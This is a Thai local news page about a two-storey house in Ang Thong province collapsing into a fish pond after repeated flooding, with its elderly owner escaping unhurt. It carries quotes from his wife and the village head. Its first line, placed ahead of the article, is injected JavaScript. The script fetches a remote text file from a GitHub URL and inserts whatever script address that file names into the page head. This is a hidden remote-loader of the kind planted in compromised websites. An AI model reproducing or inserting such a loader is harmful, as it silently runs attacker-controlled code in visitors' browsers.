;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); อ่างทอง บ้านทรุดพังเสียหายทั้งหลังเดชะบุญเจ้าของย้ายไปนอนอีกที่รอดหวุดหวิด - ThaiReference | อาสาไทยยืนยัน
อ่างทอง บ้านทรุดพังเสียหายทั้งหลังเดชะบุญเจ้าของย้ายไปนอนอีกที่รอดหวุดหวิด 

ผู้สื่อข่าวได้รับแจ้งว่าบ้านเรือนประชาชนเกิดการทรุดตัว  ส่งผลให้ตัวบ้านพังเสียหายลงไปในบ่อเลี้ยงปลาทั้งหลัง  เหตุเกิดบริเวณบ้านเลขที่ 67/7  หมู่ที่ 1  ตำบลราชสถิตย์  อำเภอไชโย  จังหวัดอ่างทอง  พบว่าบ้านหลังดังกล่าวปลูกเป็นบ้านคอนกรีตเสริมเหล็ก 2 ชั้น  สภาพของบ้านยุบตัวลงมาพังเสียหายทั้งหลัง  บางส่วนพังลงไปในบ่อเลี้ยงปลาข้างบ้านที่ขุดเอาไว้  เดชะบุญในขณะเกิดเหตุ  นาย ประดิษ์  สุขประเสริฐ อายุ 64 ปี เจ้าของบ้าน  ได้ย้ายเข้าไปพักในห้องที่สร้างขึ้นใหม่ที่ปลูกอยู่ติดกัน  รอดตายราวปาฏิหารย์ไม่ได้รับบาดเจ็บแต่อย่างใด  มีเพียงอาการตกใจและเสียขวัญ  ทางเจ้าของบ้านจึงต้องให้ช่างมาทำการตัดไฟฟ้าที่ตัวบ้าน  เพราะเกรงว่าไฟฟ้าจะรัดวงจรทำให้เป็นอันตรายกับคนในบ้าน  พร้อมแจ้งหน่วยงานที่เกี่ยวข้องมาดำเนินการตรวจสอบ

 จากการสอบถาม นาง วันเพ็ญ  สุขประเสริญ อาย 63 ปี ภรรยาเจ้าของบ้าน  เปิดเผยว่า  บ้านหลังดังกล่าวปลูกอยู่กลางทุ่งนา  เมื่อถึงฤดูน้ำหลากก็จะไหลเข้าท่วมพื้นที่บ้าน  น้ำจะไหลเข้าท่วมแทบทุกปี  จึงแก้ปัญหาโดยการสร้างกำแพงกั้นน้ำ  แต่เมื่อครั้งน้ำท่วมใหญ่  มวลน้ำจำนวนมากได้ดันจนกำแพงพังเข้าท่วมทั้งหลังเกือบมิดหลังคา  ซึ่งตนเองคาดว่าสาเหตุที่บ้านพังลงมาเสียหาย  เกิดจากการถูกน้ำท่วมทำให้บ้านทรุดตัว  และเกิดรอยร้าวขึ้นทุกปี  จนทำให้ทรุดตัวลงมาพังเสียหายทั้งหลัง  โดยขณะเกิดเหตุสามีของตนเองออกไปรางวัดที่ติด  จึงได้ไปอยู่ที่บ้านของลูกสาวอีกหลังหนึ่ง  หากเกิดตอนสามีของตนเองอยู่  คงจะถูกบ้านทับจนได้รับบาดเจ็บหรือเสียชีวิตก็เป็นได้

 ด้าน นางสาวนภาพร  กิ่งไทร ผู้ใหญ่บ้าน หมู่ที่ 1  กล่าวว่า  หลังจากได้รับแจ้งจากเจ้าของบ้าน  ตนเองได้รับเรื่องพร้อมแจ้งเรื่องไปทางหน่วยงานที่เกี่ยวข้องให้ทราบแล้ว  พร้อมเข้ามาตรวจสอบความเสียหายที่เกิดขึ้น  แต่เนื่องจากเป็นวันหยุดราชการ  จึงจะต้องรอเจ้าหน้าที่มาทำการตรวจสอบในวันจันทร์ที่จะถึงนี้  เพื่อทำการประเมิณค่าเสียหาย  และดำเนินการช่วยเหลืออย่างเร่งด่วนต่อไป

@chaijexu

อ่างทอง หวิดสลดบ้านทรุดพังเสียหายทั้งหลังเดชะบุญเจ้าของย้ายไปนอนอีกที่รอดหวุดหวิด

♬ เสียงต้นฉบับ – TONGJUDKADHAD NEWS – TONGJUDKADHAD NEWS

กนกศักดิ์  แสงตระการ / อ่างทอง